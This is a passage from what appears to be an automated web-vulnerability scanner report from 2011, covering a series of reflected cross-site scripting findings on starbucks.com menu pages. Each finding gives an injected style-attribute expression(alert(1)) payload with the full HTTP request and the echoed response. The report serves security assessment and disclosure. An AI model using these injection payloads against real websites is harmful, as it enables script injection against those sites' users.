Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:10 GMT
Connection: close
Content-Length: 44389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/red-velvet-cupcake?6abbb"style="x:expression(alert(1))"62d0d1600ca=1"/>
...[SNIP]...

1.852. http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa4bb"style%3d"x%3aexpression(alert(1))"fdc2532897b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa4bb"style="x:expression(alert(1))"fdc2532897b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake?fa4bb"style%3d"x%3aexpression(alert(1))"fdc2532897b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:53 GMT
Connection: close
Content-Length: 44696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-banana-chocolate-chip-coffee-cake?fa4bb"style="x:expression(alert(1))"fdc2532897b=1"/>
...[SNIP]...

1.853. http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0103"style%3d"x%3aexpression(alert(1))"e7f8b0994af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f0103"style="x:expression(alert(1))"e7f8b0994af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake?f0103"style%3d"x%3aexpression(alert(1))"e7f8b0994af=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:59 GMT
Connection: close
Content-Length: 44736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-cinnamon-swirl-coffeecake?f0103"style="x:expression(alert(1))"e7f8b0994af=1"/>
...[SNIP]...

1.854. http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/reduced-fat-very-berry-coffeecake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e31eb"style%3d"x%3aexpression(alert(1))"b5a7dd3f58b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e31eb"style="x:expression(alert(1))"b5a7dd3f58b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/reduced-fat-very-berry-coffeecake?e31eb"style%3d"x%3aexpression(alert(1))"b5a7dd3f58b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:11 GMT
Connection: close
Content-Length: 44686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/reduced-fat-very-berry-coffeecake?e31eb"style="x:expression(alert(1))"b5a7dd3f58b=1"/>
...[SNIP]...

1.855. http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/starbucks-classic-coffee-cake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c557"style%3d"x%3aexpression(alert(1))"640124d6dd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c557"style="x:expression(alert(1))"640124d6dd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/starbucks-classic-coffee-cake?7c557"style%3d"x%3aexpression(alert(1))"640124d6dd5=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:20 GMT
Connection: close
Content-Length: 44398

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/starbucks-classic-coffee-cake?7c557"style="x:expression(alert(1))"640124d6dd5=1"/>
...[SNIP]...

1.856. http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-double-chocolate-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9f82"style%3d"x%3aexpression(alert(1))"12a2cb3519d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9f82"style="x:expression(alert(1))"12a2cb3519d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/treat-sized-double-chocolate-cookie?e9f82"style%3d"x%3aexpression(alert(1))"12a2cb3519d=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:01 GMT
Connection: close
Content-Length: 43344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/treat-sized-double-chocolate-cookie?e9f82"style="x:expression(alert(1))"12a2cb3519d=1"/>
...[SNIP]...

1.857. http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/treat-sized-peanut-butter-cookie

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e303f"style%3d"x%3aexpression(alert(1))"5921d239029 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e303f"style="x:expression(alert(1))"5921d239029 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/treat-sized-peanut-butter-cookie?e303f"style%3d"x%3aexpression(alert(1))"5921d239029=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:36 GMT
Connection: close
Content-Length: 43323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/treat-sized-peanut-butter-cookie?e303f"style="x:expression(alert(1))"5921d239029=1"/>
...[SNIP]...

1.858. http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/vanilla-bean-cupcake

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c2"style%3d"x%3aexpression(alert(1))"a4806e71177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c2"style="x:expression(alert(1))"a4806e71177 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/vanilla-bean-cupcake?177c2"style%3d"x%3aexpression(alert(1))"a4806e71177=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:10 GMT
Connection: close
Content-Length: 44004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/vanilla-bean-cupcake?177c2"style="x:expression(alert(1))"a4806e71177=1"/>
...[SNIP]...

1.859. http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/bakery/zucchini-walnut-muffin

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1b5d"style%3d"x%3aexpression(alert(1))"335d173fd30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1b5d"style="x:expression(alert(1))"335d173fd30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/bakery/zucchini-walnut-muffin?b1b5d"style%3d"x%3aexpression(alert(1))"335d173fd30=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:53 GMT
Connection: close
Content-Length: 43532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/bakery/zucchini-walnut-muffin?b1b5d"style="x:expression(alert(1))"335d173fd30=1"/>
...[SNIP]...

1.860. http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed0f5"style%3d"x%3aexpression(alert(1))"926577702c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ed0f5"style="x:expression(alert(1))"926577702c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate?ed0f5"style%3d"x%3aexpression(alert(1))"926577702c9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:59:01 GMT
Connection: close
Content-Length: 41980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/chicken-and-hummus-snack-plate?ed0f5"style="x:expression(alert(1))"926577702c9=1"/>
...[SNIP]...

1.861. http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc8c9"style%3d"x%3aexpression(alert(1))"dbeae4face2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc8c9"style="x:expression(alert(1))"dbeae4face2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/fruit-and-cheese-plate?bc8c9"style%3d"x%3aexpression(alert(1))"dbeae4face2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:47 GMT
Connection: close
Content-Length: 41397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/fruit-and-cheese-plate?bc8c9"style="x:expression(alert(1))"dbeae4face2=1"/>
...[SNIP]...

1.862. http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/fruit-and-snack-plates/protein-plate

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b24"style%3d"x%3aexpression(alert(1))"e4919033202 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c7b24"style="x:expression(alert(1))"e4919033202 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/fruit-and-snack-plates/protein-plate?c7b24"style%3d"x%3aexpression(alert(1))"e4919033202=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:00 GMT
Connection: close
Content-Length: 42074

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/fruit-and-snack-plates/protein-plate?c7b24"style="x:expression(alert(1))"e4919033202=1"/>
...[SNIP]...

1.863. http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 576ec"style%3d"x%3aexpression(alert(1))"20b9b21506b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 576ec"style="x:expression(alert(1))"20b9b21506b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll?576ec"style%3d"x%3aexpression(alert(1))"20b9b21506b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:44:39 GMT
Connection: close
Content-Length: 42517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/bacon-parmesan-frittata-and-gouda-on-an-artisan-roll?576ec"style="x:expression(alert(1))"20b9b21506b=1"/>
...[SNIP]...

1.864. http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d0a4"style%3d"x%3aexpression(alert(1))"0ec2a3fedc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d0a4"style="x:expression(alert(1))"0ec2a3fedc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap?7d0a4"style%3d"x%3aexpression(alert(1))"0ec2a3fedc3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:45:52 GMT
Connection: close
Content-Length: 43047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/hot-breakfast/egg-white-spinach-and-feta-wrap?7d0a4"style="x:expression(alert(1))"0ec2a3fedc3=1"/>
...[SNIP]...

1.865. http://www.starbucks.com/menu/food/hot-breakfast/oatmeal-brown-sugar [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/hot-breakfast/oatmeal-brown-sugar

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9dc0"style%3d"x%3aexpression(alert(1))"2675c27b610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9dc0"style="x:expression(alert(1))"2675c27b610 in the application's response.

